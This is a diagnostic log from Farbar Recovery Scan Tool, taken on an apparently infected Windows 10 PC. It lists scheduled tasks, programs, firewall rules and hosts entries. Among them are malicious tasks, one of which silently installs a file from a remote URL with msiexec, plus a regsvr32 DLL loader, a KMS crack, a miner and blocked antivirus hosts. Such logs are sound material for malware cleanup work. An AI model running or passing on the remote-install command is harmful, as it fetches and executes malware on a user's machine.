Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-04-2017
Ran by Zrujnowanyxd9 (27-04-2017 19:33:52)
Running from D:\frst
Windows 10 Pro Version 1511 (X64) (2017-03-30 18:13:09)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3012374695-455075304-3318307465-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3012374695-455075304-3318307465-503 - Limited - Disabled)
Guest (S-1-5-21-3012374695-455075304-3318307465-501 - Limited - Disabled)
Zrujnowanyxd9 (S-1-5-21-3012374695-455075304-3318307465-1001 - Administrator - Enabled) => C:\Users\Zrujnowanyxd9

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0210.908.16431 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version: - Valve)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
Gyazo 3.3.1 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
H1Z1: King of the Kill (HKLM\...\Steam App 433850) (Version: - Daybreak Game Company)
League of Legends (HKLM-x32\...\League of Legends 4.2.1) (Version: 4.2.1 - Riot Games)
League of Legends (x32 Version: 4.2.1 - Riot Games) Hidden
Microsoft OneDrive (HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 18.0.1 - OBS Project)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8083 - Realtek Semiconductor Corp.)
Skype™ 7.35 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.35.101 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\TeamSpeak 3 Client) (Version: 3.1.3 - TeamSpeak Systems GmbH)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08B220ED-CA63-47C0-9B96-D2E786BF8F95} - System32\Tasks\Hmechhebity Engine => C:\Program Files (x86)\Guqasp\xckehither.exe
Task: {35E3854B-B5D3-40F3-B506-B09AC0377F47} - System32\Tasks\Online Special Application V2G2 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {3FA55C77-A4F6-4C43-9942-AD689BB4982D} - \{0E057A47-0D09-047E-0A11-050E0B7F1105} -> No File <==== ATTENTION
Task: {40DD700B-4A6B-47B3-BCCB-68C47C3E4333} - \Arilile -> No File <==== ATTENTION
Task: {7347C4FD-5AF2-4A9A-92DB-63850708F081} - System32\Tasks\{724FF862-C5E4-4FC9-BE51-5F528FA2872A} => C:\ProgramData\{2B503F68-9CFB-88C3-E447-8D56CAAA9236}\A7C6278E-106D-9025-035E-B160DBE6199D.exe <==== ATTENTION
Task: {80BC49A2-C9FD-49A6-B72D-EF6CA8B7934D} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-02-10] (Advanced Micro Devices, Inc.)
Task: {86AAEC1D-5DA8-4571-BD63-FF2D210305B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-16] (Google Inc.)
Task: {89EEBA59-2405-45B9-BE45-3F9841163E15} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
Task: {8FEC6B15-A25B-4396-BB08-A9352F283B32} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic
Task: {95BA9DB4-0939-40A0-9F2E-27B2238AD73A} - System32\Tasks\Online Special Application V2G1 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {9D7C3408-FDCE-4C5D-A262-92319F6F32C6} - System32\Tasks\Updater_Online_Special_Application => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION
Task: {A5EB08BF-A84C-4AC4-B892-591E4D26A10D} - System32\Tasks\Online Special Application V2G3 => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: {BAE1CDC5-C0AC-422E-A1BC-662C1667448F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-16] (Google Inc.)
Task: {CB64652F-D53B-42F3-8917-068748F6954D} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {DD0ADC35-75A7-4934-871D-CCDF5A376D89} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-03-28] ()
Task: {FFE0E285-252E-477A-AC58-72B9786038E1} - System32\Tasks\{E75C0273-D8D6-D893-53C3-288602D0B879} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\90361a19\aa2c3b22.dll" <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Online Special Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Special Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Special Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Special_Application.job => C:\Program Files (x86)\Microleaves\Online Special Application\Online Special Application Updater.exe <==== ATTENTION

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Zrujnowanyxd9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)

==================== Loaded Modules (Whitelisted) ==============

2017-03-31 12:46 - 2017-03-04 07:31 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2017-03-30 20:12 - 2017-03-30 20:12 - 00026112 _____ () C:\Windows\KMS-R@1n.exe
2017-04-11 21:29 - 2017-03-28 12:17 - 02656952 _____ () C:\Windows\system32\CoreUIComponents.dll
2017-03-31 14:11 - 2017-03-31 14:16 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2017-04-11 21:29 - 2017-03-28 12:17 - 02656952 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-07-13 00:12 - 2016-07-13 00:12 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-07-13 00:22 - 2016-07-13 00:22 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2017-03-31 12:46 - 2017-03-04 05:19 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-31 12:46 - 2017-03-04 05:14 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-04-11 21:29 - 2017-03-28 07:01 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-11 21:29 - 2017-03-28 07:04 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-03-31 14:11 - 2017-03-31 14:16 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2017-03-31 14:11 - 2017-03-31 14:17 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2017-03-31 12:42 - 2017-03-10 02:13 - 00674592 _____ () D:\Program Files (x86)\Steam\SDL2.dll
2017-03-31 12:42 - 2016-09-01 03:02 - 04969248 _____ () D:\Program Files (x86)\Steam\v8.dll
2017-04-27 17:57 - 2017-04-26 01:55 - 02465056 _____ () D:\Program Files (x86)\Steam\video.dll
2017-03-31 12:42 - 2016-01-27 09:49 - 02549760 _____ () D:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-31 12:42 - 2016-01-27 09:49 - 00491008 _____ () D:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-31 12:42 - 2016-01-27 09:49 - 00332800 _____ () D:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-31 12:42 - 2016-01-27 09:49 - 00442880 _____ () D:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-31 12:42 - 2016-01-27 09:49 - 00485888 _____ () D:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-31 12:42 - 2016-09-01 03:02 - 01563936 _____ () D:\Program Files (x86)\Steam\icui18n.dll
2017-03-31 12:42 - 2016-09-01 03:02 - 01195296 _____ () D:\Program Files (x86)\Steam\icuuc.dll
2017-04-27 17:57 - 2017-04-26 01:55 - 00848672 _____ () D:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-31 12:42 - 2016-07-05 00:17 - 00266560 _____ () D:\Program Files (x86)\Steam\openvr_api.dll
2017-03-31 12:42 - 2017-01-30 23:41 - 68875552 _____ () D:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-04-27 16:51 - 2017-03-09 07:31 - 02187096 _____ () C:\Program Files (x86)\Everness\Application\libglesv2.dll
2017-04-27 16:51 - 2017-03-09 07:31 - 00086360 _____ () C:\Program Files (x86)\Everness\Application\libegl.dll
2017-04-27 16:51 - 2017-04-26 05:14 - 00108544 _____ () c:\programdata\apple\common\cloud\winhelper.dll
2017-04-27 16:51 - 2017-04-26 05:14 - 00108544 _____ () C:\ProgramData\Apple\Common\Cloud\WinHelper.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-30 09:24 - 2017-04-16 14:03 - 00000888 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 v1.ff.avast.com
127.0.0.1 vlcproxy.ff.avast.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3012374695-455075304-3318307465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "Malwarebytes TrayApp"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "PWAS4BY1OC4T7L5"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "4FAWBDTDAXQ7DGI"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "isMiner V 1.9"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "BA70O5FIV3OXQ52"
HKU\S-1-5-21-3012374695-455075304-3318307465-1001\...\StartupApproved\Run: => "RV45SKF07USE2PP"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{094289B8-CF1B-405A-9CEB-3AA38778D2C0}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{219FA7D0-04DB-44C7-AE11-2E0F81BCF95F}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{5677C33A-0C8E-4152-84C0-BBD0F78D2224}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{FA2A4710-D1E4-4DBE-9880-1C3977ED02A7}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F463474C-0E5D-47EA-99A7-0605BBD11831}] => (Allow) D:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BE7598E2-916A-404F-87BD-F56D61BF4B7F}] => (Allow) D:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BF8A1F2B-12D3-40BE-9401-8E7F1E3E0ADB}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{77B86A6A-4CD0-443C-9C7D-3E44B5BCB45B}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [TCP Query User{1C4DC932-5E27-4E03-A92A-FA353C0BCC5E}D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [UDP Query User{3FF49A3C-044D-4C38-A4F2-16257118C04D}D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [{A8D87BB5-C364-4BC9-A5DD-165EC99E55D8}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{4A3150A9-FA69-4335-B12A-E40612140E5E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{E2842494-9D8A-432F-8631-8CD9AB10F6CB}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{354BFF14-58E3-451B-BC9A-F5D8E7C09499}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{F3EDF1CC-3946-4469-8CFF-9503385F0DEB}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxhdwd110_27qkmlgfsxx27qkmlgfsx.dat
FirewallRules: [{41192BC5-94AA-4961-842E-A0A47022D60C}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxhdwd110_27qkmlgfsxx27qkmlgfsx.dat
FirewallRules: [{CE39AAF7-4C38-4689-B7B9-F8E1DCD8FC64}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe
FirewallRules: [{E23DBC0F-6C2E-41DF-BD27-78ADF4C8DEC9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{B0CE0967-C713-4947-9305-C2D419DD3E04}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

==================== Restore Points =========================

19-04-2017 11:25:47 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Microsoft PS/2 Mouse
Description: Microsoft PS/2 Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/27/2017 06:52:01 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 27.4.2017.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 1ba4
Start Time: 01d2bf763ca7d0fc
Termination Time: 4294967295
Application Path: D:\frst\FRST64.exe
Report Id: d3a442f8-2b69-11e7-bc72-4ccc6ab08677
Faulting package full name:
Faulting package-relative application ID:

Error: (04/27/2017 04:56:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iSafeSvc.exe, version: 6.10.493.30849, time stamp: 0x5840f8ac
Faulting module name: ntdll.dll, version: 10.0.10586.672, time stamp: 0x580efaf8
Exception code: 0xc0000005
Fault offset: 0x0003e26f
Faulting process id: 0x127c
Faulting application start time: 0x01d2bf65c5b8e73a
Faulting application path: C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 5c6767a9-8b11-4feb-906d-1ecae36dd271
Faulting package full name:
Faulting package-relative application ID:

Error: (04/27/2017 04:41:33 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-94VA4VB)
Description: Activation of app Microsoft.WindowsCalculator_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (04/27/2017 04:41:33 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Calculator.exe version 10.1703.1703.1001 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: e48
Start Time: 01d2bf6452514fdf
Termination Time: 4294967295
Application Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1703.601.0_x64__8wekyb3d8bbwe\Calculator.exe
Report Id: 99b6dce7-2b57-11e7-bc72-4ccc6ab08677
Faulting package full name: Microsoft.WindowsCalculator_10.1703.601.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: App

Error: (04/26/2017 03:53:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mrt.exe, version: 5.47.13703.0, time stamp: 0x58dec9f9
Faulting module name: combase.dll, version: 10.0.10586.839, time stamp: 0x58ba4028
Exception code: 0xc0000005
Fault offset: 0x00000000000be805
Faulting process id: 0x850
Faulting application start time: 0x01d2be94803e3b99
Faulting application path: C:\Windows\system32\mrt.exe
Faulting module path: C:\Windows\system32\combase.dll
Report Id: 764a0d8b-dd0a-4293-aade-007f70655645
Faulting package full name:
Faulting package-relative application ID:

System errors:
=============
Error: (04/27/2017 07:29:21 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-94VA4VB)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

